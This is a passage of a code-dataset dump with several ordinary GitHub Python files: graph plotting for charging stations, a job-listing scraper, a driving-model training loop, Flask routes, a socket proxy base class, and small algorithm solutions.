weight=el[2])\n \n # Extract node positions\n node_positions = {node: (lon, lat) for node, (lat, lon) in nx.get_node_attributes(g, 'pos').items()}\n\n # Get the edgelist\n edgelist = list(g.edges())\n\n # Create a scatter plot of nodes\n plt.figure(figsize=(8, 6))\n #print(f\"nodes: \\n {nodes} \\n edges: \\n {edges}, othernodes: \\n{othernodes}\")\n nx.draw_networkx_nodes(g, pos=node_positions, node_size=200, node_color='blue', alpha=0.7)\n\n '''# Draw othernodes in a different color\n othernode_positions = {i: (lon, lat) for i, (lat, lon) in enumerate(othernodes)}\n print(othernode_positions)\n nx.draw_networkx_nodes(g, pos=othernode_positions, node_size=200, node_color='red', alpha=0.7)\n '''\n '''for i ,(lat, lon) in enumerate(othernodes):\n g.add_node(el['own_id'], pos=(lat, lon), color='red')'''\n \n\n\n\n # Draw edges with weights as labels\n nx.draw_networkx_edges(g, pos=node_positions, edgelist=edgelist, width=2, alpha=0.5, edge_color='gray')\n #edge_labels = nx.get_edge_attributes(g, 'weight')\n #nx.draw_networkx_edge_labels(g, pos=node_positions, edge_labels=edge_labels)\n\n # Display the plot\n plt.title(\"Graph of Nodes in France\")\n plt.axis('off') # Turn off axis labels\n plt.show()\n\ndef create_graph3(nodes, edges, ids):\n \"\"\"\n Creates a graph with colored nodes based on the given IDs.\n\n Parameters:\n - nodes (list): List of dictionaries representing nodes with 'own_id', 'lat', and 'lon'.\n - edges (list): List of tuples representing edges with the format (node1, node2, weight).\n - ids (list): List of node IDs to be colored red.\n\n Returns:\n - None: The function plots the graph but doesn't return any value.\n \"\"\"\n # Create a graph\n g = nx.Graph()\n\n # Add nodes\n for el in nodes:\n if(el['id'] in ids):\n node_id = el['own_id']\n pos = (el['lat'], el['lon'])\n g.add_node(node_id, pos=pos, color='red' if node_id in ids else 'blue')\n\n # Add edges with distance\n for el in edges:\n g.add_edge(el[0], el[1], weight=el[2])\n\n # Extract node positions and colors\n node_positions = {node: (lon, lat) for node, (lat, 
lon) in nx.get_node_attributes(g, 'pos').items()}\n node_colors = [g.nodes[node]['color'] for node in g.nodes]\n\n # Get the edgelist\n edgelist = list(g.edges())\n\n # Create a scatter plot of nodes\n plt.figure(figsize=(8, 6))\n nx.draw_networkx_nodes(g, pos=node_positions, node_size=100, node_color=node_colors, alpha=0.7)\n\n # Draw edges with weights as labels\n nx.draw_networkx_edges(g, pos=node_positions, edgelist=edgelist, width=2, alpha=0.5, edge_color='gray')\n\n # Display the plot\n plt.title(\"Graph of Nodes\")\n plt.axis('off') # Turn off axis labels\n plt.show()\n\ndef create_graph4(nodes, edges, coords):\n # Create a graph\n g = nx.Graph()\n\n # Add nodes\n for el in nodes:\n node_id = el['own_id']\n pos = (el['lat'], el['lon'])\n g.add_node(node_id, pos=pos, color='red')\n\n for i, (lat, lon) in enumerate(coords):\n g.add_node(i+424, pos=(lat, lon), color='blue')\n\n \n\n # Add edges with distance\n for el in edges:\n g.add_edge(el[0], el[1], weight=el[2])\n\n # Extract node positions and colors\n node_positions = {node: (lon, lat) for node, (lat, lon) in nx.get_node_attributes(g, 'pos').items()}\n node_colors = [g.nodes[node]['color'] for node in g.nodes]\n\n # Get the edgelist\n edgelist = list(g.edges())\n\n # Create a scatter plot of nodes\n plt.figure(figsize=(8, 6))\n nx.draw_networkx_nodes(g, pos=node_positions, node_size=200, node_color=node_colors, alpha=0.7)\n\n # Draw edges with weights as labels\n nx.draw_networkx_edges(g, pos=node_positions, edgelist=edgelist, width=2, alpha=0.5, edge_color='gray')\n\n # Display the plot\n plt.title(\"Graph of Nodes\")\n plt.axis('off') # Turn off axis labels\n plt.show()\n\n\n\ndef plot_points(coords):\n \"\"\"\n Plots multiple points on a graph using networkx.\n\n Parameters:\n - coords (list): A list of tuples representing the coordinates (latitude, longitude) of each point.\n\n Returns:\n - None: The function plots the points but doesn't return any value.\n \"\"\"\n # Create a graph\n G = nx.Graph()\n\n # Add nodes to the graph using coordinates as node labels\n for i, (lat, lon) in enumerate(coords):\n G.add_node(i, pos=(lon, lat)) # Use longitude as x-coordinate and latitude as y-coordinate\n\n # Extract positions of nodes for plotting\n pos = nx.get_node_attributes(G, 'pos')\n\n # Draw the graph with nodes at specified positions\n nx.draw(G, pos, with_labels=False, node_size=300, node_color='skyblue', font_size=5, font_color='black')\n\n '''# Add labels to nodes\n for i, (lat, lon) in enumerate(coords):\n plt.text(lon, lat, f'({lat}, {lon})', fontsize=8, ha='right')'''\n\n # Display the plot\n plt.title('Plotting Points on a Graph')\n plt.show()\n\n\ndef print_latlon(coords):\n #Create a graph \n g = nx.Graph()\n\n #add_nodes\n for i, (lat,lon) in enumerate(coords):\n #print(f\"nodes: {el['own_id']}, pos=({el['lat']}, {el['lon']})\")\n g.add_node(i, pos=(lat, lon))\n \n # Extract node positions\n node_positions = {node: (lon, lat) for node, (lat, lon) in nx.get_node_attributes(g, 'pos').items()}\n\n # Get the edgelist\n edgelist = list(g.edges())\n\n # Create a scatter plot of nodes\n plt.figure(figsize=(8, 6))\n nx.draw_networkx_nodes(g, pos=node_positions, node_size=200, node_color='blue', alpha=0.7)\n\n\n # Draw edges with weights as labels\n nx.draw_networkx_edges(g, pos=node_positions, edgelist=edgelist, width=2, alpha=0.5, edge_color='gray')\n #edge_labels = nx.get_edge_attributes(g, 'weight')\n #nx.draw_networkx_edge_labels(g, pos=node_positions, edge_labels=edge_labels)\n\n # Display the plot\n plt.title(\"Graph 
of Nodes in France\")\n plt.axis('off') # Turn off axis labels\n plt.show()\n\n\n'''\nso guys, update time\nI implemented all functions up to the graph creation, but one function isn't working correctly. It is the add_service_to_highway function. \nMy idea is: \n1. compute the centroid of every service station and rest area (merge_area_to_point). then we have a list of coordinates.\n2. Find for every coordinate the nearest \"normal\" street node and save the id in a list (add_service_to_highway); the list is marked_street_nodes.\nThese nodes should be the nodes we are working with.\n3. modify the highway (delete_usless_highway_nodes). This function takes every way (street) and checks for every node in the way whether it is a marked street node or a normal one. Normal ones are deleted.\n4. add_own_id for easier debugging and better readability\n5. create_edges_array. Now that we have all the nodes we need and each one has a new id, we can create the edges. This also sorts out double edges and calculates the length.\n6. delete_useless_street_nodes_of_nodes_array. Just for printing the graph. We want to only display the nodes we are using.\n7. display graph\n\n\nNow the add_service_to_highway function doesn't work how I intended. I don't know whether it is a programming mistake or a mistake in my approach.\nIs there a smarter approach or do you find the mistake?\n\nOnce we fix it, we should have the graph and can start with the next tasks.\n\n'''\n\n\n\n\nfilepath_service = \"service-stations-Aquitaine.json\"\njson_data_service = load_json_data(filepath_service)\n\nfilepath_highway = \"street-Nodes-Aquitaine.json\"\njson_data_highway = load_json_data(filepath_highway)\n\n\n\n\n#nodes_... is a list of dict containing all nodes (of that type)\n#way is a list of dict containing all ways of streets or rest areas\nnodes_service, way_service = split_array_service_stations(json_data_service)\nnodes_highway, way_highway = split_array_highway(json_data_highway)\n\n#nodes_service: nodes of the edges of service stations\n# array of: {'type': 'node', 'id': 304610017, 'lat': 44.8883184, 'lon': -0.5799906}, {'type': 'node', 'id': 304610018, 'lat': 44.888388, 'lon': -0.5796747}\n#way_service: ways of the edges of service stations, ids only contain ids of nodes_service\n# array of: {'type': 'way', 'id': 1018761865, 'nodes': [9396560469, 9396560468, 9396560467, 9635617586, 9635617587, 307456719, 9396560469], 'tags': {'highway': 'services'}}\n#nodes_highway: nodes of all possible street points\n# array of: {'type': 'node', 'id': 10981442267, 'lat': 43.7195563, 'lon': -0.269957}\n#way_highway: ways of the streets. only contains ids of nodes_highway\n# array of {'type': 'way', 'id': 1018760500, 'nodes': [9396528101, 9396528100, 9396528099, 9396528098, 9396528097, 9396528101], 'tags': {'highway': 'services'}}\n\n\n\n#service is a list of points (lat, lon), the centroid of every service station\nservice = merge_area_to_point(way_service, nodes_service)\n\n#adds own_id property, to sort easier\nnodes_highway = add_own_id(nodes_highway)\n#{'type': 'node', 'id': 10981442267, 'lat': 43.7195563, 'lon': -0.269957, 'own_id': 1}\ncreate_graph(nodes_highway, [])\n\n\n#merge to nearest street node\n#marked_street_nodes are a list of nodes_highway, which were the closest to a rest area (only a list of ids)\nmarked_street_nodes = add_service_to_highway(nodes_highway, service)\n\ncreate_graph3(nodes_highway, [], marked_street_nodes)\n\n\n#delete all the unmarked street nodes from way_highway\n#marked_ways is array of streets. 
every street is an array out of nodes\nmarked_ways = []\n#junction_ids is an array of id of nodes, which aren't service stations, but rather junction nodes.\njunction_ids = []\n#for every street\nfor el in way_highway:\n #chech each point, if its a marked one, if not delete\n marked_ids = []\n for node_id in el['nodes']:\n #print(get_line(node_id, nodes_highway))\n #check if nodes are marked, if yes add to list\n junc_check = check_if_node_is_junction(node_id, nodes_highway)\n if node_id in marked_street_nodes or junc_check == 1:\n if(junc_check == 1):\n junction_ids.append(node_id)\n\n marked_ids.append(node_id)\n #reset list of nodes on the highway to only the marked ones\n if len(marked_ids) > 0:\n marked_ways.append(marked_ids) \nprint(marked_ways)\n\n'''way_highway_only_marked = []\nfor el in nodes_highway:\n if el['id'] in marked_street_nodes:\n way_highway_only_marked.append(el)\n\n#way_highway_only_marked: array of dict: {'type': 'node', 'id': 638664, 'lat': 43.3410243, 'lon': -0.3775863, 'own_id': 282}\n\n#contains the highways, but only with the marked street nodes. The street nodes which are service stations\n#way_highway_only_marked2 = delete_usless_highway_nodes(way_highway, marked_street_nodes)\n\nprint(way_highway[-5])\nprint(way_highway_only_marked2[-5])'''\n\n'''\n#create the edges with the own_ids\nedges_with_own_id = create_edges_array(nodes_highway, way_highway_only_marked)\n\n#create_graph2(nodes_highway, edges_with_own_id, service)\n#print_latlon(service)\n\n\n#list of all street nodes, which represent a rest area\nnodes_service_final = delete_useless_street_nodes_of_nodes_array(nodes_highway, marked_street_nodes)\n\ncreate_graph(nodes_service_final, edges_with_own_id)\n\n'''\n\n\n\n\n\n","repo_name":"Janus124/Applied-Algorithm-Charging-Stations","sub_path":"create-graph.py","file_name":"create-graph.py","file_ext":"py","file_size_in_byte":20512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26748129771","text":"\nimport requests # for accesing web page\nfrom bs4 import BeautifulSoup # for pulling data out of html\nimport pandas as pd # for general working with data\n# from nltk import word_tokenize # text mining / analysis\nfrom collections import Counter\nfrom nltk.corpus import stopwords\nimport re #regex\n\n# A function take jobtitle and location as arguments and return correct url for web scraping purpose\ndef searchquery(jobtitle, location):\n title = jobtitle.replace(' ', '+')\n loc = location.replace(' ', '+')\n url = 'http://www.indeed.com/jobs?q=%22'+ title +'%22&radius=50&limit=50&l='+loc\n return url\n\n# A function to take job list's url as an input and return dataframe with job titles and url to job post\ndef collect_job_list(url):\n # create empty list\n jobtitle, hreflink = [], []\n \n # get contents from the web\n r = requests.get(url)\n soup = BeautifulSoup(r.content, 'html.parser')\n \n # find the page number\n x = soup.findAll('div', {'id': 'searchCount'})[0].text.replace(',', '')\n pageN = int(x[x.find('of ')+3:])\n \n # iterate over page number \n for i in range(0, pageN, 50):\n joblisturl = url + '&start=' + str(i)\n r = requests.get(joblisturl)\n soup = BeautifulSoup(r.content, 'html.parser')\n \n # iterate over each listed job post on search result to obtain job title and link\n for data in soup.findAll('a', {'data-tn-element': 'jobTitle'}):\n if 'clk?jk=' in data.get('href'):\n hreflink.append(data.get('href'))\n jobtitle.append(data.text)\n df = pd.DataFrame({'title': jobtitle, 'link': hreflink})\n return df\n\n\n# convert the href link data in dataframe to proper url\ndef properurl(link):\n joburl = 'http://www.indeed.com/viewjob?jk=' +\\\n link[link.find('clk?jk=')+len('clk?jk='):link.find('&fccid')]\n return joburl\n \n\n# A function to take job posting's url as an input, mine text data from selected job post. \n# and return the text from the post.\ndef collect_job_data(joblink_list):\n jobdesc = []\n #iterate over href link in data frame\n for i in range(0, len(joblink_list)):\n joburl = properurl(joblink_list[i])\n \n #extracting text data from selected job posting \n r = requests.get(joburl)\n soup = BeautifulSoup(r.content, 'html.parser')\n desc = ''.join(soup.findAll('td', {'class': 'snip'})[0].text)\n desc = re.sub('[^A-Za-z0-9&]+', ' ', desc)\n jobdesc.append(desc[:desc.find('ago')].replace('\\n', ' ').lower())\n return jobdesc\n\n# A function to take str as input, split the str and count the words\ndef countword(text):\n #removing stopwords from the data\n stop = stopwords.words('english')\n \n \n nostopword = ' '.join([word for word in text.split() if word not in stop])\n #create word count list\n count = Counter(nostopword.split())\n return count\n\n# A function to take words as input and return the list of counts for the words of interest.\ndef sortlist(words, countlist):\n result= [] \n for word in words.split():\n result.append([x for x in countlist if word in x])\n return result\n\n\n\n\n\n\n ","repo_name":"ykimmate14/job_post_web_scraping","sub_path":"job_web_scraping.py","file_name":"job_web_scraping.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10066562762","text":"import os\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nfrom custom_mobilenet import CustomMobileNet\n\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nclass DriveDataset(torch.utils.data.Dataset):\n def __init__(self, root_dir, transform=None):\n temp = root_dir.split('/')\n self.root_dir = '/'.join(temp[:-1])\n self.transform = transform\n\n self.data = pd.read_csv(root_dir)\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n row = self.data.iloc[idx]\n \n # Load the RGB image\n folder, file = row['filenames'].split('/')\n img_rgb_path = os.path.join(\n self.root_dir, 'Images', folder, 'rgb', file)\n img_rgb = Image.open(img_rgb_path)\n\n if self.transform:\n img_rgb = self.transform(img_rgb)\n\n # Read the labels of the i-th sample\n throttle = row['throttle']\n steering = row['steer']\n action_left = row['action_left']\n action_right = row['action_right']\n action_forward = row['action_forward']\n no_action = row['no_action']\n \n # Build the sample\n sample = (img_rgb,\n # Tensor of action parameters.\n torch.tensor([\n float(action_left), float(action_right),\n float(action_forward), float(no_action)\n ]),\n # Tensor of throttle and steering labels.\n torch.tensor([\n float(throttle), float(steering)\n ]))\n\n return sample\n\n\nif __name__ == '__main__':\n model = CustomMobileNet(pretrained=True)\n\n model.cuda()\n\n train_dir = 'path/to/train_dataset_final.csv'\n val_dir = 'path/to/val_dataset_final.csv'\n\n train_loader = torch.utils.data.DataLoader(\n dataset=DriveDataset(train_dir, transforms.Compose([\n transforms.Resize((224, 224), interpolation=Image.BICUBIC),\n transforms.ToTensor(),\n lambda T: T[:3]\n ])),\n batch_size=64,\n shuffle=True,\n num_workers=12,\n pin_memory=True\n )\n\n val_loader = torch.utils.data.DataLoader(\n dataset=DriveDataset(val_dir, transforms.Compose([\n transforms.Resize((224, 224), interpolation=Image.BICUBIC),\n transforms.ToTensor()\n ])),\n batch_size=64,\n shuffle=False,\n num_workers=12,\n pin_memory=True\n )\n\n criterion = nn.MSELoss().cuda()\n optimizer = torch.optim.Adam(model.parameters())\n\n losses = []\n\n # Loop to train the network\n for epoch in range(50):\n start = time.time()\n\n model.train()\n train_loss = 0\n # Define an interactive progress bar\n train_progress = tqdm(enumerate(train_loader),\n desc=\"train\",\n total=len(train_loader))\n \n # Iterate over each minibatch of 64 samples\n for i, (X, actions, y) in train_progress:\n # Copy the data to the GPU\n X = X.cuda(non_blocking=True)\n actions = actions.cuda(non_blocking=True)\n y = y.cuda(non_blocking=True)\n y_hat = model(X, actions)\n \n # Compute the mean squared error for the throttle\n loss1 = criterion(y_hat[:, 0], y[:, 0])\n # Compute the mean squared error for the steering\n loss2 = criterion(torch.tanh(y_hat[:, 1]), y[:, 1])\n # Combine both errors\n loss = (loss1 + loss2)/2\n\n # Optimization step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n train_loss += float(loss.detach())\n train_progress.set_postfix(loss=(train_loss/(i+1)))\n\n model.eval()\n\n val_loss = 0\n with torch.no_grad():\n model.eval()\n val_progress = tqdm(enumerate(val_loader),\n desc=\"val\",\n total=len(val_loader))\n for i, (X, actions, y) in val_progress:\n X = X.cuda(non_blocking=True)\n actions = actions.cuda(non_blocking=True)\n y = y.cuda(non_blocking=True)\n y_hat = model(X, actions)\n\n loss1 = criterion(y_hat[:, 0], y[:, 0])\n loss2 = criterion(y_hat[:, 1], y[:, 1])\n loss = (loss1 + loss2) / 2\n\n val_loss += float(loss)\n val_progress.set_postfix(loss=(val_loss/(i+1)))\n\n end = time.time()\n\n t_loss = train_loss / len(train_loader)\n v_loss = val_loss / len(val_loader)\n print('epoch:', epoch, 'L:', t_loss, v_loss, 'Time:', end-start)\n\n torch.save(\n {\n 'epoch': epoch,\n 'arch': 'mobilenet_custom',\n 'state_dict': model.state_dict()\n },\n f'weights/mob_drive_{epoch}.pth.tar')\n losses.append([epoch, t_loss, v_loss])\n np.save('hist_drive', np.array(losses))\n","repo_name":"nubol23/thesis-document","sub_path":"codigos/apendices/drive_train.py","file_name":"drive_train.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1410920170","text":"from app import db\nfrom flask import Blueprint, request, jsonify, make_response, abort\nfrom app.models.board import Board\nfrom app.models.card import Card\nfrom .route_helper import validate_model, create_card, validate_message_length, query_sort, validate_board_data\n\nbp = Blueprint('boards', __name__, url_prefix=\"/boards\")\n\n# CREATE\n# create a board endpoint, returns 201 if successful\n@bp.route(\"\", methods=[\"POST\"])\ndef create_board():\n request_body = request.get_json()\n\n validate_board_data(request_body)\n\n new_board = Board.from_dict(request_body)\n\n db.session.add(new_board)\n db.session.commit()\n\n return jsonify({\"board\": new_board.to_dict()}), 201\n\n# READ\n# Gets all Boards and returns 200\n@bp.route(\"\", methods=[\"GET\"])\ndef read_all_boards():\n boards = Board.query.all()\n\n board_response = []\n for board in boards: \n board_response.append(board.to_dict())\n return jsonify(board_response), 200\n\n# Gets one board by board id and returns 200 if found\n@bp.route(\"/<board_id>\", methods=[\"GET\"])\ndef read_one_board(board_id):\n board = validate_model(Board, board_id)\n response_body = board.to_dict()\n return jsonify(response_body), 200\n\n# Gets cards by board_id\n@bp.route(\"/<board_id>/cards\", methods=[\"GET\"])\ndef retrieve_cards(board_id): \n board = validate_model(Board, board_id)\n\n card_query = query_sort(board.id)\n\n cards_response = [card.to_dict() for card in card_query]\n\n return jsonify(cards_response), 200\n\n# UPDATE\n# assign cards to a board\n@bp.route(\"/<board_id>/cards\", methods=[\"POST\"])\ndef add_cards_to_board(board_id):\n board = validate_model(Board, board_id)\n \n request_body = request.get_json()\n validate_message_length(request_body)\n card_id = create_card(request_body, board_id)\n \n card = validate_model(Card, card_id)\n board.cards.append(card)\n \n db.session.commit()\n\n return jsonify({\"board_id\": board.id, \"card\": card.to_dict()})\n\n\n","repo_name":"lizzach/back-end-inspiration-board","sub_path":"app/board_routes.py","file_name":"board_routes.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"14237036608","text":"from app import app\nfrom flask import render_template, jsonify, flash\nfrom utils import get_all_reminders, get_one_reminder, compress\n\n@app.route('/')\ndef index():\n page_title = \"Reminder - Home\"\n \n template = render_template('index.html', page_title=page_title)\n\n return compress(template)\n\n@app.route('/r')\ndef reminders():\n count=0\n reminders = get_all_reminders()\n\n # reminder counter\n for reminder in reminders:\n if reminder['deleted'] == 0:\n count += 1\n\n page_title = \"Reminders ({}) - All Reminders\".format(count)\n \n template = render_template('reminders.html', reminders=reminders, page_title=page_title)\n\n return compress(template)\n\n@app.route('/r/')\ndef reminder(id):\n page_title=''\n reminder = get_one_reminder(id)\n\n if reminder['deleted'] == 1:\n page_title = \"Deleted\"\n else:\n page_title = \"Reminder - {0}\".format(reminder['title'])\n\n template = render_template('reminder.html', reminder=reminder, page_title=page_title)\n\n return compress(template)\n\n@app.route('/dashboard')\ndef dashboard():\n page_title = \"Reminder - Dashboard\"\n name = \"Hassan\"\n reminders = get_all_reminders()\n\n template = render_template('dashboard.html', page_title=page_title, name=name, reminders=reminders)\n\n return compress(template)","repo_name":"Suuuuuprr/Rustin-Joger-final","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39705052694","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# utf-8 encoding\n\nfrom gevent import socket as _socket\nimport re\nimport gevent\nfrom httptool import HttpPool\nfrom gevent.lock import BoundedSemaphore\n\n\nclass UpstreamBase(object):\n u\"\"\" Socket module bound to a specific route.\n\n Usage: create an instance of this class, then use the instance as if it were the socket module. All operations go through the route configured in config.\"\"\"\n\n # the wrapped socket class\n socket = None\n\n def __init__(self, config):\n self.type = config.get('type', None)\n self.config = config\n\n import upstream as upstream_mod\n\n upconfig = config.get('upstream', None)\n\n if upconfig:\n uptype = upconfig.get(\"type\", None)\n if uptype is None:\n raise ConfigError(u'[config error] upstream has no type configured!')\n\n Upstream = upstream_mod.get_upstream(uptype)\n if Upstream is None:\n raise ConfigError(u'[config error] upstream type %s is not supported!' % uptype)\n\n self.upstream = Upstream(upconfig)\n pass\n else:\n if self.type != 'direct':\n self.upstream = upstream_mod.get_upstream('direct')({'type':'direct'})\n else:\n self.upstream = _socket\n\n self.http_pool = HttpPool(self,lock=BoundedSemaphore)\n\n def create_connection(self,address, timeout=5):\n if timeout == _socket._GLOBAL_DEFAULT_TIMEOUT:\n timeout = 10\n raise NotImplementedError()\n\n def get_display_name(self):\n return self.get_name()\n\n def get_name(self):\n return '%s-host:port' % (self.type)\n\n # HTTP request handling.\n # HTTP proxies may override this method;\n # SOCKS-style proxies do not need to.\n def get_http_conn(self,address):\n u\"\"\" Get an HTTP connection for use in a with statement. \"\"\"\n return self.http_pool.get_conn(address)\n\n\n\n\nclass ConfigError(ValueError):\n def __init__(self, *args, **kwargs):\n ValueError.__init__(self, *args, **kwargs)\n\nclass UpstreamError(_socket.error):\n def __init__(self, *args, **kwargs):\n _socket.error.__init__(self, *args, **kwargs)\n\nclass UpstreamLoginError(UpstreamError):\n def __init__(self, *args, **kwargs):\n _socket.error.__init__(self, *args, **kwargs)\n\nclass UpstreamProtocolError(UpstreamError):\n def __init__(self, *args, **kwargs):\n _socket.error.__init__(self, *args, **kwargs)\n\nclass UpstreamConnectError(UpstreamError):\n def __init__(self, *args, **kwargs):\n _socket.error.__init__(self, *args, **kwargs)\n\n\n\n","repo_name":"GameXG/TcpRoute","sub_path":"upstream/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"69"}
+{"seq_id":"74785394140","text":"\"\"\"\nComment Module Serializer\n\"\"\"\nfrom rest_framework import serializers\nfrom datetime import date\n\nfrom siteinfo.models import Error\nfrom cafe.models import Bartender, Cafe, MenuItem\nfrom comment.models import Comment\n\n\nclass CreateCommentSerializer(serializers.ModelSerializer):\n \"\"\"Create Comment Serializer\"\"\"\n\n class Meta:\n model = Comment\n fields = [\"item_id\", \"text\"]\n\n def validate(self, attrs):\n item_id = attrs.get(\"item_id\")\n\n user = self.context.get(\"request\").user\n menu_item = MenuItem.objects.filter(id=item_id).first()\n\n if not menu_item:\n msg = \"این آیتم وجود ندارد\"\n raise serializers.ValidationError(msg)\n cafe = menu_item.cafe\n\n is_bartender = Bartender.objects.filter(\n cafe=cafe, user=user, is_active=True\n ).exists()\n\n if user == cafe.owner or is_bartender:\n msg = \"برای خودتون میخواین کامنت بذارید ؟\"\n raise serializers.ValidationError(msg)\n\n return attrs\n\n def create(self, validated_data):\n user = self.context.get(\"request\").user\n item_id = validated_data.get(\"item_id\")\n\n try:\n menu_item = MenuItem.objects.filter(id=item_id).first()\n cafe = menu_item.cafe\n\n now_date = date.today()\n\n comment = Comment.objects.create(\n user=user,\n cafe_id=cafe.id,\n is_cafe=False,\n date=now_date,\n **validated_data\n )\n comment.save()\n return comment\n\n except Exception as e:\n Error.objects.create(\n reference=\"Comment - serializers.py - create customer comment\",\n status=str(type(e).__name__),\n description=str(e),\n )\n msg = \"مشکلی ایجاد شده\"\n raise serializers.ValidationError(msg)\n\n\nclass ResponseCommentSerializer(serializers.ModelSerializer):\n \"\"\"Response Comment Serializer\"\"\"\n\n id = serializers.IntegerField(required=True)\n # text = serializers.CharField(max_length=500, required=True)\n\n class Meta:\n model = Comment\n fields = [\"id\", \"text\"]\n\n def validate(self, attrs):\n comment_id = attrs.get(\"id\")\n user = self.context.get(\"request\").user\n try:\n comment = Comment.objects.get(id=comment_id)\n cafe = Cafe.objects.get(id=comment.cafe_id)\n is_bartender = Bartender.objects.filter(\n cafe=cafe, user=user, is_active=True\n ).exists()\n\n if not (user == cafe.owner or is_bartender):\n msg = \"جواب کامنت بقیه را نمیتوانید بدهید\"\n raise serializers.ValidationError(msg)\n except:\n msg = \"همچین کامنتی وجود ندارد\"\n raise serializers.ValidationError(msg)\n return attrs\n\n def create(self, validated_data):\n user = self.context.get(\"request\").user\n comment_id = validated_data.get(\"id\")\n text = validated_data.get(\"text\")\n\n try:\n comment = Comment.objects.get(id=comment_id)\n now_date = date.today()\n\n response = Comment.objects.create(\n user=user,\n cafe_id=comment.cafe_id,\n is_cafe=True,\n date=now_date,\n text=text,\n item_id=comment.item_id,\n )\n\n response.save()\n\n comment.response = response\n comment.save()\n\n return response\n\n except Exception as e:\n Error.objects.create(\n reference=\"Comment - serializers.py - create response comment\",\n status=str(type(e).__name__),\n description=str(e),\n )\n msg = \"مشکلی ایجاد شده\"\n raise serializers.ValidationError(msg)\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n \"\"\"Comment Serializer\"\"\"\n\n class Meta:\n model = Comment\n fields = \"__all__\"\n # read_only_fields = '__all__'\n\n def to_representation(self, instance):\n response = super().to_representation(instance)\n response[\"name\"] = instance.user.fullName\n try:\n item = 
MenuItem.objects.filter(id=instance.item_id).first()\n response[\"item\"] = item.title\n\n if instance.response:\n response[\"response\"] = {\n \"name\": instance.response.user.fullName,\n \"date\": instance.response.date,\n \"text\": instance.response.text,\n }\n\n except:\n None\n return response\n","repo_name":"Hamid-Ba/Iran-Cafe","sub_path":"comment/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20352205539","text":"_ = int(input())\n#inp = list(map(int,input().split()))\ntestInp = input().split(\" \")\norigInp = list(map(int,testInp))\nSorInp = list(map(int,testInp))\nSorInp.sort()\n\ngoods = 0\nrev = _-1\n\ncount = 0\nif SorInp==origInp:\n\tprint(\"yes\")\n\tprint(\"1 1\")\nelse:\n\twhile origInp[goods]==SorInp[goods]:\n\t\tgoods += 1\n\twhile origInp[rev] == SorInp[rev]:\n\t\trev -= 1\n\tif origInp[goods:rev+1] == SorInp[goods:rev+1][::-1]:\n\t\tprint(\"yes\")\n\t\tprint(1+min(goods,rev),1+max(goods,rev))\n\telse:\n\t\tprint(\"no\")","repo_name":"GarlicToothpaste/Codeforces-Solutions","sub_path":"451B/451B.py","file_name":"451B.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70197145821","text":"# import necessary packages\nimport numpy as np\nimport cv2\n\ndef process_letter(thresh,output):\t\n\t# assign the kernel size\t\n\tkernel = np.ones((2,1), np.uint8) # vertical\n\t# use closing morph operation then erode to narrow the image\t\n\ttemp_img = cv2.morphologyEx(thresh,cv2.MORPH_CLOSE,kernel,iterations=3)\n\t# temp_img = cv2.erode(thresh,kernel,iterations=2)\t\t\n\tletter_img = cv2.erode(temp_img,kernel,iterations=1)\n\t\n\t# find contours \n\t(_,contours, _) = cv2.findContours(letter_img.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\t\n\t# loop in all the contour areas\n\tfor cnt in contours:\n\t\tx,y,w,h = cv2.boundingRect(cnt)\n\t\tcv2.rectangle(output,(x-1,y-5),(x+w,y+h),(0,255,0),1)\n\n\treturn output\t\n\n\nfor i in range(1,34):\n\tpath1=\"gray_num2/num\"+str(i)+\".jpg\"\n\timage1 = cv2.imread(path1)\n\toutput1_letter = cv2.imread(path1)\n\tgray1 = cv2.cvtColor(image1, cv2.COLOR_BGR2GRAY)\n\tret1,th1 = cv2.threshold(gray1,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n\toutput1_letter = process_letter(th1,output1_letter)\n\tpath2=\"gray_num2_output/num\"+str(i)+\".jpg\"\n\tcv2.imwrite(path2, output1_letter)\t\n","repo_name":"katomaran-videoanalytics/Testing","sub_path":"layout/text_analysis.py","file_name":"text_analysis.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16103993446","text":"class Solution(object):\n def validateStackSequences(self, pushed, popped):\n \"\"\"\n :type pushed: List[int]\n :type popped: List[int]\n :rtype: bool\n \"\"\"\n if pushed == popped: return True\n size = len(pushed)\n\n stack = []\n c = 0\n for index in range(size):\n stack.append(pushed[index])\n\n while stack:\n if stack[-1] != popped[0]:\n break\n else:\n stack.pop()\n popped.pop(0)\n\n if stack == []:\n return True\n return False\n","repo_name":"Huoyanlifusu/LeetCode","sub_path":"946栈的压入弹出.py","file_name":"946栈的压入弹出.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
